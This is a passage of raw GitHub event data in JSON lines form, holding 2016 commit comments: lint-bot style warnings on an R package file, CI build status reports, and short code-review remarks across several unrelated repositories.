^\n```\n[R/drawLocal.R:10:22:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L10) *style:* **Put spaces around all infix operators.**\n```r\n​\t\txmax = optimize(f,c(0,1))$minimum\n                    ~^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n^~\n```\n[R/drawLocal.R:11:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L11) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidx1=which(x==1);\n^\n```\n[R/drawLocal.R:11:10:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L11) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n         ^~~~~~~~~\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L11) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                     ^\n```\n[R/drawLocal.R:11:22:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L11) *style:* **Put spaces around all infix operators.**\n```r\n​\t\tymax = pm_sadaux(xmax,I,th,j,k)\n                    ~^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n^~\n```\n[R/drawLocal.R:12:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L12) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tif(length(idx1)) {\n^\n```\n[R/drawLocal.R:12:8:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L12) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L12) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:12:20:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L12) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty0 = pm_sadaux(0,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tif(ymax<(y0+1)) {\n^~\n```\n[R/drawLocal.R:13:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L13) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  if ((k<j)||((k==j)&&(th>1))) {\n^~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = 0;\n^~~\n```\n[R/drawLocal.R:14:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L14) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = -Inf;\n^~~\n```\n[R/drawLocal.R:14:30:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L14) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = 0;\n                             ^\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t} else {\n^~\n```\n[R/drawLocal.R:15:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L15) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th==1)) {\n^~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tf <- function(x) {\n^~~\n```\n[R/drawLocal.R:16:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L16) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t      y[idx1] = 0;\n^~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n^~~~\n```\n[R/drawLocal.R:17:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L17) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  } else if ((k==j)&&(th< 1)) {\n^~\n```\n[R/drawLocal.R:17:12:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L17) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\t\treturn(pm_sadaux(x,I,th,j,k) - ymax + 1);\n           ^~~~~~~~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t}\n^~~\n```\n[R/drawLocal.R:18:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L18) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t  y[idx1] = Inf;\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xL = f(1e-10);\n^~~\n```\n[R/drawLocal.R:19:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L19) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t   }\n^~\n```\n[R/drawLocal.R:19:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L19) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xL = f(1e-10);\n    ^~~~~~~~~~~~~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#xR = f(xmax);\n^~~\n```\n[R/drawLocal.R:20:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L20) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t}\n^\n```\n[R/drawLocal.R:20:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L20) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#xR = f(xmax);\n    ^~~~~~~~~~~~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n^~~\n```\n[R/drawLocal.R:21:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L21) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\tidxp = which((x>0)&(x<1));\n^\n```\n[R/drawLocal.R:21:5:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L21) *style:* **Commented code should be removed.**\n```r\n​\t\t\t#cat(cnt,xL,xR,\"\\n\"); flush.console();\n    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n^~~\n```\n[R/drawLocal.R:22:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L22) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\txx=x[idxp];\n^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L22) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                             ^\n```\n[R/drawLocal.R:22:30:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L22) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\txmin = uniroot(f,c(1e-10,xmax))$root;\n                            ~^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t}\n^~\n```\n[R/drawLocal.R:23:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L23) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\taux = log(th) + lgamma(I)-lgamma(I+j) +\n^\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\tx1 = (xmax+1)/2;\n^~\n```\n[R/drawLocal.R:24:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L24) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(j+1) - lgamma(k+1) - lgamma(j-k+1) +\n^~\n```\n[R/drawLocal.R:24:20:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L24) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\tx1 = (xmax+1)/2;\n                   ^\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~\n```\n[R/drawLocal.R:25:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L25) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*xx+k) - lgamma(I*xx) +\n^~\n```\n[R/drawLocal.R:25:8:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L25) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n       ^~~~~~~~~\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L25) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                   ^\n```\n[R/drawLocal.R:25:20:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L25) *style:* **Put spaces around all infix operators.**\n```r\n​\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                  ~^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n^~\n```\n[R/drawLocal.R:26:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L26) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  lgamma(I*(1-xx)+j-k)-lgamma(I*(1-xx)) +\n^~\n```\n[R/drawLocal.R:26:22:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L26) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​\t\twhile(ymax < (y1+1)) {\n                     ^\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n^~~\n```\n[R/drawLocal.R:27:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L27) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t  (th-1)*log(1-xx)-log(xx);\n^~\n```\n[R/drawLocal.R:27:28:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L27) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\tx1 = (x1 + 1) / 2;\n                           ^\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n^~~\n```\n[R/drawLocal.R:28:1:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L28) *style:* **Use two spaces to indent, never tabs.**\n```r\n​\ty[idxp] = aux;\n^\n```\n[R/drawLocal.R:28:9:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L28) *warning:* **no visible global function definition for ‘pm_sadaux’**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n        ^~~~~~~~~\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L28) *style:* **Use <-, not =, for assignment.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                           ^\n```\n[R/drawLocal.R:28:28:](https://github.com/thijsjanzen/GUILDS/blob/40bba2e75b9c39db855fa25d30685a8b57a57f98/R/drawLocal.R#L28) *style:* **Put spaces around all infix operators.**\n```r\n​\t\t\ty1 = pm_sadaux(x1,I,th,j,k);\n                          ~^~\n```\n"}},"created_at":"2016-09-22T08:52:24Z"}
{"id":"4601164192","type":"CommitCommentEvent","actor":{"login":"bogdando"},"repo":{"name":"kubespray/kargo"},"payload":{"comment":{"id":19126764,"position":7,"line":25,"path":"roles/dnsmasq/templates/01-kube-dns.conf.j2","commit_id":"eefebb9362cf33c67ebda14970b6d7cef2342896","created_at":"2016-09-22T08:52:32Z","updated_at":"2016-09-22T08:52:32Z","body":"This is a very important optimization for a large scale.\r\nI'm exploring more options as well, like max-ttl, cache-size/dns-forward-max (both have defaults of a 150, which is too low!), and the most important thing is to verify the caching as actually working for the cluster domain name resolve requests! It seems that dnsmasq not always caches by design, see https://groups.google.com/forum/#!topic/consul-tool/NQDkxOj5Bks                                                                                       \r\nhttp://lists.thekelleys.org.uk/pipermail/dnsmasq-discuss/2015q1/009231.html"}},"created_at":"2016-09-22T08:52:32Z"}
{"id":"4601165654","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"senbox-org/s2tbx"},"payload":{"comment":{"id":19126765,"position":42,"line":106,"path":"s2tbx-s2msi-reader/src/main/java/org/esa/s2tbx/dataio/s2/l1c/L1cMetadata.java","commit_id":"715d0cd2648fd95d746627004f3f84b709f55454","created_at":"2016-09-22T08:52:52Z","updated_at":"2016-09-22T08:52:52Z","body":"Same comment here : why excluding angles in user product ?"}},"created_at":"2016-09-22T08:52:52Z"}
{"id":"4601166534","type":"CommitCommentEvent","actor":{"login":"ziya931"},"repo":{"name":"ziya931/bazuzoo.cf"},"payload":{"comment":{"id":19126768,"position":null,"line":null,"path":null,"commit_id":"be5028ec5eee6def5072bc312973f8a9f2813f3e","created_at":"2016-09-22T08:53:04Z","updated_at":"2016-09-22T08:53:04Z","body":"a"}},"created_at":"2016-09-22T08:53:04Z"}
{"id":"4601167168","type":"CommitCommentEvent","actor":{"login":"julienmalik"},"repo":{"name":"senbox-org/s2tbx"},"payload":{"comment":{"id":19126770,"position":40,"line":101,"path":"s2tbx-s2msi-reader/src/main/java/org/esa/s2tbx/dataio/s2/l2a/L2aMetadata.java","commit_id":"715d0cd2648fd95d746627004f3f84b709f55454","created_at":"2016-09-22T08:53:12Z","updated_at":"2016-09-22T08:53:12Z","body":"Same here"}},"created_at":"2016-09-22T08:53:12Z"}
{"id":"4601168249","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19126772,"position":null,"line":null,"path":null,"commit_id":"6e7aeef484a0853ecd47b0b4bedb51b8dfa9306c","created_at":"2016-09-22T08:53:26Z","updated_at":"2016-09-22T08:53:26Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1095](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13848&buildTypeId=ota_plus_RviSotaServer_Ci) is now running\n"}},"created_at":"2016-09-22T08:53:26Z"}
{"id":"4601171043","type":"CommitCommentEvent","actor":{"login":"W-i-Z-o"},"repo":{"name":"W-i-Z-o/Projektarbeit_I"},"payload":{"comment":{"id":19126781,"position":null,"line":null,"path":null,"commit_id":"584bbb8be3d4781472637ffdc5b18e02d592041f","created_at":"2016-09-22T08:54:04Z","updated_at":"2016-09-22T08:54:04Z","body":"Version 2"}},"created_at":"2016-09-22T08:54:04Z"}
{"id":"4601174355","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":19126793,"position":null,"line":null,"path":null,"commit_id":"aae0e95f7486847390320bb564f1ad69693a64c2","created_at":"2016-09-22T08:54:49Z","updated_at":"2016-09-22T08:54:49Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 1094](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=13842&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **UNKNOWN**\nSummary: Canceled (Tests passed: 208, ignored: 3; exit code 137 (new)) Build time: 00:07:31"}},"created_at":"2016-09-22T08:54:49Z"}
{"id":"4601179479","type":"CommitCommentEvent","actor":{"login":"W-i-Z-o"},"repo":{"name":"W-i-Z-o/Projektarbeit_I"},"payload":{"comment":{"id":19126808,"position":null,"line":null,"path":null,"commit_id":"9a1ceb0501cf4aab38fb12253fee4ee81e076f8f","created_at":"2016-09-22T08:55:55Z","updated_at":"2016-09-22T08:55:55Z","body":"Version 3"}},"created_at":"2016-09-22T08:55:55Z"}
{"id":"4601181199","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126810,"position":null,"line":null,"path":null,"commit_id":"f3d1fd242de1bd966357f0e949a2a91718d7d16b","created_at":"2016-09-22T08:56:16Z","updated_at":"2016-09-22T08:56:16Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.5](http://build.prxm.it:8813/viewLog.html?buildId=3673&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:41"}},"created_at":"2016-09-22T08:56:16Z"}
{"id":"4601181204","type":"CommitCommentEvent","actor":{"login":"ProximoBuild"},"repo":{"name":"NEventStore/NEventStore.Persistence.MongoDB"},"payload":{"comment":{"id":19126811,"position":null,"line":null,"path":null,"commit_id":"f3d1fd242de1bd966357f0e949a2a91718d7d16b","created_at":"2016-09-22T08:56:16Z","updated_at":"2016-09-22T08:56:16Z","body":"TeamCity NEventStore :: MongoDB :: Build [Build 5.3.6-beta.5](http://build.prxm.it:8813/viewLog.html?buildId=3673&buildTypeId=nes_mongo_build&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 72 Build time: 00:02:41"}},"created_at":"2016-09-22T08:56:16Z"}
{"id":"4601181496","type":"CommitCommentEvent","actor":{"login":"webaddkevin"},"repo":{"name":"webaddkevin/ShortCutPhotoZoomPro"},"payload":{"comment":{"id":19126813,"position":null,"line":null,"path":null,"commit_id":"2fb6d3d04faceea7bee4d4cdc326e06d6bb8aa73","created_at":"2016-09-22T08:56:21Z","updated_at":"2016-09-22T08:56:21Z","body":"提交代码"}},"created_at":"2016-09-22T08:56:21Z"}
{"id":"4601182118","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/app"},"payload":{"comment":{"id":19126816,"position":null,"line":null,"path":null,"commit_id":"22e0e183d51dbf23802e0ed3a61452c4f450186c","created_at":"2016-09-22T08:56:29Z","updated_at":"2016-09-22T08:56:29Z","body":"**[unitTests_js_branches run failed](http://jenkins.wikia-prod:8080/job/unitTests_js_branches/33187/testReport/) for this commit**"}},"created_at":"2016-09-22T08:56:29Z"}
{"id":"4601183530","type":"CommitCommentEvent","actor":{"login":"rockfruit"},"repo":{"name":"bikalabs/bika.lims"},"payload":{"comment":{"id":19126819,"position":4,"line":59,"path":"bika/lims/browser/storage/add_units.pt","commit_id":"ca3b465616d65576dd1b1245989a7aaf74341ac0","created_at":"2016-09-22T08:56:46Z","updated_at":"2016-09-22T08:56:46Z","body":"@hocinebendou this means that user cannot enter 'A' to get units numbered eg A,B,C or AA,AB,AC.  I previously reverted this line, but if you like it, okay!"}},"created_at":"2016-09-22T08:56:46Z"}
{"id":"4601185456","type":"CommitCommentEvent","actor":{"login":"23Skidoo"},"repo":{"name":"hvr/multi-ghc-travis"},"payload":{"comment":{"id":19126826,"position":4,"line":146,"path":"make_travis_yml_2.hs","commit_id":"1b6dc0aa9c42ab9e0c4bf47c30fdec8fedddee68","created_at":"2016-09-22T08:57:13Z","updated_at":"2016-09-22T08:57:13Z","body":"> (it would help if cabal would emit the info \"using $N threads\")\r\n\r\nSee https://github.com/haskell/cabal/pull/3884."}},"created_at":"2016-09-22T08:57:13Z"}
{"id":"4601185575","type":"CommitCommentEvent","actor":{"login":"moneroj"},"repo":{"name":"moneroj/moneroj"},"payload":{"comment":{"id":19126828,"position":null,"line":null,"path":null,"commit_id":"31f20d7e4376de424679d2f73963ed730b67ea50","created_at":"2016-09-22T08:57:14Z","updated_at":"2016-09-22T08:57:14Z","body":"Initial commit\r\nmoneroj"}},"created_at":"2016-09-22T08:57:14Z"}
{"id":"4601186537","type":"CommitCommentEvent","actor":{"login":"rockfruit"},"repo":{"name":"bikalabs/bika.lims"},"payload":{"comment":{"id":19126830,"position":4,"line":75,"path":"bika/lims/browser/storage/add_managed.pt","commit_id":"ca3b465616d65576dd1b1245989a7aaf74341ac0","created_at":"2016-09-22T08:57:26Z","updated_at":"2016-09-22T08:57:26Z","body":"@hocinebendou here too!"}},"created_at":"2016-09-22T08:57:26Z"}
{"id":"4601188551","type":"CommitCommentEvent","actor":{"login":"merik444"},"repo":{"name":"Thrax989/Project-Phoenix"},"payload":{"comment":{"id":19126834,"position":null,"line":null,"path":null,"commit_id":"959c2d264f5d976f087c8682776cd8bd7c32ea9e","created_at":"2016-09-22T08:57:51Z","updated_at":"2016-09-22T08:57:51Z","body":"I tamed it on my dev center using an admin toon and the /createcreature mittens baby command lol"}},"created_at":"2016-09-22T08:57:51Z"}
{"id":"4601192071","type":"CommitCommentEvent","actor":{"login":"howardchung"},"repo":{"name":"odota/blog"},"payload":{"comment":{"id":19126843,"position":10,"line":10,"path":"_posts/2016-09-22-cosmetics.md","commit_id":"8bedd895a95c2d67709955523d3569b40455b2cc","created_at":"2016-09-22T08:58:38Z","updated_at":"2016-09-22T08:58:38Z","body":"just make the text either \"here\" or the link text."}},"created_at":"2016-09-22T08:58:38Z"}
{"id":"4601192297","type":"CommitCommentEvent","actor":{"login":"davidjsherman"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19126844,"position":13,"line":583,"path":"dashel/dashel-posix.cpp","commit_id":"474435c132694c5ca4d546d8e28fd79220e83106","created_at":"2016-09-22T08:58:41Z","updated_at":"2016-09-22T08:58:41Z","body":"I don't known what is the more natural solution. Previously, SelectableStream could assume that it owned any file descriptor created by a subclass, and factored out the responsibility for closing it. But now, it is the derived class that knows whether it has created or borrowed a socket, and whether it should close it. But moving the `close` to the destructor of every derived class is a quick way to introduce a future bug. And it would be a shame to oblige every derived class to remember this step, for the one atypical case of `PollStream`.\r\n\r\nPerhaps a virtual method `shutdownFd` called by `SelectableStream~SelectableStream` to close file descriptors if necessary, that could be overridden by `PollStream` to do nothing?"}},"created_at":"2016-09-22T08:58:41Z"}
{"id":"4601193028","type":"CommitCommentEvent","actor":{"login":"howardchung"},"repo":{"name":"odota/blog"},"payload":{"comment":{"id":19126846,"position":12,"line":12,"path":"_posts/2016-09-22-cosmetics.md","commit_id":"8bedd895a95c2d67709955523d3569b40455b2cc","created_at":"2016-09-22T08:58:51Z","updated_at":"2016-09-22T08:58:51Z","body":"capitalization"}},"created_at":"2016-09-22T08:58:51Z"}
{"id":"4601194634","type":"CommitCommentEvent","actor":{"login":"howardchung"},"repo":{"name":"odota/blog"},"payload":{"comment":{"id":19126848,"position":12,"line":12,"path":"_posts/2016-09-22-cosmetics.md","commit_id":"8bedd895a95c2d67709955523d3569b40455b2cc","created_at":"2016-09-22T08:59:12Z","updated_at":"2016-09-22T08:59:12Z","body":"don't use abbreviation \"u\""}},"created_at":"2016-09-22T08:59:12Z"}
{"id":"4601195255","type":"CommitCommentEvent","actor":{"login":"cordellaluca"},"repo":{"name":"cordellaluca/MOCI"},"payload":{"comment":{"id":19126851,"position":null,"line":null,"path":null,"commit_id":"eb2ae0eba7f147d065fd5775595f39f165826b1a","created_at":"2016-09-22T08:59:20Z","updated_at":"2016-09-22T08:59:20Z","body":"Readme "}},"created_at":"2016-09-22T08:59:20Z"}
{"id":"4601195461","type":"CommitCommentEvent","actor":{"login":"hudokkow"},"repo":{"name":"hudokkow/xbmc"},"payload":{"comment":{"id":19126853,"position":null,"line":null,"path":null,"commit_id":"f3df1d8404e59cd215c7d0437263a3983f59938c","created_at":"2016-09-22T08:59:23Z","updated_at":"2016-09-22T08:59:23Z","body":"The main problem is that add-ons:\r\n> game.libretro.2048\r\ngame.libretro.4do\r\ngame.libretro.beetle-bsnes\r\ngame.libretro.beetle-gba\r\ngame.libretro.beetle-lynx\r\ngame.libretro.beetle-ngp\r\ngame.libretro.beetle-pce-fast\r\ngame.libretro.beetle-psx\r\ngame.libretro.bluemsx\r\ngame.libretro.bnes\r\ngame.libretro.bsnes-mercury-accuracy\r\ngame.libretro.bsnes-mercury-balanced\r\ngame.libretro.bsnes-mercury-performance\r\ngame.libretro.dosbox\r\ngame.libretro.fceumm\r\ngame.libretro.gambatte\r\ngame.libretro.genplus\r\ngame.libretro.handy\r\ngame.libretro.lutro\r\ngame.libretro.mame\r\ngame.libretro.meteor\r\ngame.libretro.mgba\r\ngame.libretro.mupen64plus\r\ngame.libretro.nestopia\r\ngame.libretro.pcsx-rearmed\r\ngame.libretro.picodrive\r\ngame.libretro.pocketsnes\r\ngame.libretro.prboom\r\ngame.libretro.quicknes\r\ngame.libretro.quicknes\r\ngame.libretro.reicast\r\ngame.libretro.scummvm\r\ngame.libretro.snes9x\r\ngame.libretro.snes9x-next\r\ngame.libretro.stella\r\ngame.libretro.vba-next\r\ngame.libretro.vbam\r\ngame.libretro.yabause\r\n\r\nrequire MinGW but the only one that actually has the FindMinGW.cmake module is\r\n\r\n> game.libretro.quicknes\r\n\r\nThe last build that successfully built (some of the) add-ons was 